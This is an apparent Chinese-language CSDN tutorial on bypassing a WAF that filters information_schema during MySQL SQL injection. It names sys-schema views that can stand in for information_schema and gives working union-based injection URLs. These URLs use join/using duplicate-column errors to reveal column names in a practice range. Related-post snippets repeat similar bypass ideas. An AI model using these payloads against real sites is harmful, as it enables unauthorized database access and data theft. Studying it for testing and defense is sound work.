sql注入时,waf屏蔽了information_schema如何处理?

于 2024-08-05 15:39:41 发布
阅读量376 收藏 5
点赞数 4
文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60286636/article/details/140928507
版权

information_schema可代替库

如果使用正则表达式屏蔽了information,则想一想有没有能代替的information的库。
例如:x$schema_table_statistics这个库里面就有table_schema和table_name,但是没有列名,那么列名就需要使用无列名注入。

可以代替information_schema的表
sys.x$schema_table_statistics
sys.schema_table_statistics
sys.x$ps_schema_table_statistics_io
sys.schema_index_statistics
sys.schema_table_statistics_with_buffer

无列名注入

当出现正则表达式过滤information_schema时,可以使用无列名注入。

join函数

当用下面这条命令在security表中查询时,会出现a表和b表拼接成一个新表,如下图。

select * from users as a join users as b;

在这里插入图片描述

再对其使用一个select查询进行包裹,由于会出现多个相同的列名,那么他就会报错。就可以利用此特性进行sql注入查询列名。

select * from (select * from users as a join users as b) as c;

在这里插入图片描述

当查询完第一个列名时,使用using排除,继续查询下一个列名。

select * from (select * from users as a join users as b using(id)) as c;

在这里插入图片描述

实操

下面在靶场中进行注入测试。

第一个列名:

?id=0' union select * from (select * from users as a join users as b) as c --+

在这里插入图片描述

第二个列名:

?id=0' union select * from (select * from users as a join users as b using(id)) as c --+

在这里插入图片描述

第三个列名:

?id=0' union select * from (select * from users as a join users as b using(id,username)) as c --+

在这里插入图片描述

以此类推。

麦农111
关注
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1344
information_schema过滤与无列名注入
mysql 注入 information_schema_绕过IDS过滤information_schema继续注入
weixin_35867608的博客
02-07 1195
原文:绕过IDS过滤information_schema继续注入//利用MySQL出错爆出字段mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;ERROR 1060 (42S21): Duplicate column name 'Host'mysql> SELECT * FROM (SELECT * FROM user ...
WEB—无列名注入与过滤information_schema
sGanYu
11-09 2785
一开始由于注册admin的候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入 知识点 无列名注入 过滤information_schema 随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】 发布一个广告名为:1',内容随意 点击广告详情,弹出关键报错信息,数据库为MariaDB 继续注入,发布一个广告名为:.
Bypass information_schema
mi900709的博客
12-02 682
Bypass information_schema 前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段间想到的,这次趁着安全客活动就在这里记录一下吧~ 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQ
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5867
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对的自增ID进行监控,也就是说,如果某张存在自增ID,就可以通过该视图来获取其名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有的统计信息 ...
SQL注入中无法利用information_schema情况
qq_43936524的博客
05-14 2807
文章目录获得名sys.schema_auto_increment_columns统计信息相关视图mysql库join报错得到列名sqlmap的处理 从之前的sqlmap盲注溯源的payload中可以看出,在通过database()获得数据库名后,进一步爆出数据基本都利用了information_schema这个系统库来获得,所以自然就想到假如Waf禁止了这个系统库的使用,该怎么爆出数据呢。 查阅资料后发现有其他的几个系统自带的中也可以获得想要的信息。 获得名 sys.schema_auto_incre
SQL注入WAF小结
05-08
### SQL注入WAF小结 #### 一、概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过向Web应用程序提交恶意SQL语句来获取敏感数据、修改数据或执行其他非法操作。随着网络安全技术的发展,Web应用防火墙...
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2493
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
nginx防mysql注入_nginx的安全之通过nginx+lua的waf防火墙防sql注入和cc攻击
weixin_36314729的博客
01-29 511
2.测试页面准备:登陆页面html[root@node1 code]#cat /opt/app/code/login.htmljeson sql注入演示用户名:密码验证页面validate.php[root@node1 code]#cat /opt/app/code/validate.php
mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30467861的博客
01-28 826
本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者:whynot 转自:先知0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有...
关于MySQL绕过授予information_schema中对象报ERROR 1044(4200)错误
12-14
这个问题是微信群中网友关于MySQL权限的讨论,有这么一个业务需求(下面是他的原话): 因为MySQL的很多功能都依赖主键,我想用zabbix用户,来监控业务数据库的所有,是否都建立了主键。 监控的语句是: FROM information_schema.tables t1 LEFT OUTER JOIN information_schema.table_constraints t2 ON t1.table_schema = t2.table_schema AND t1.table_name = t2.table_name
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序处理用户输入的不安全性,来执行非授权的操作,获取敏感信息或者破坏数据库。360主机卫士是一款针对服务器的安全防护软件,其中包含了SQL...
BUUCTF:[GYCTF2020]Ezsqli --过滤information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1512
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该可以的。 但是 information_chema等被过滤了,和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤候,能够查出数据库的名字,但是明不知道,这可以用这个来sys.schem
Bypass information_schema与无列名注入
qq_45521281的博客
06-09 3835
文章目录Bypass information_schema前言前置任务MySQL5.7的新特性sys.schema_auto_increment_columnsschema_table_statistics_with_buffer、x$schema_table_statistics_with_buffer无列名注入利用joinjoin … using(xx)利用普通子查询[SWPU2019]Web1——无列名注入 Bypass information_schema 前言 聊一聊mysql在被waf禁掉了in
information_schema注入
北冥有鱼
03-30 5004
上一篇文章提到过,information_schema是mysql自带的一个,这个里存放了大量信息。 我们可以进去这个数据库简单的看一下 然后输入 show tables, 能看到这里面有很多的,我们先来看一下tables这个 可以发现这里面有很多的字段,这些字段包含了这个数据库的名称,这个数据库里的的名称,的类型,默认的引擎,版本等等。。这些东西,都会放到这个里面 还有一...
聊一聊bypass information_schema
zhangge3663的博客
05-10 273
前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段间想到的,这次趁着安全客活动就在这里记录一下吧~ # 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQL注入中它的作用是什么,那么有没有可以替代这个库
Web安全之SQL注入
最新发布
qq_42751192的博客
06-09 2391
SQL注入(SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

麦农111

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值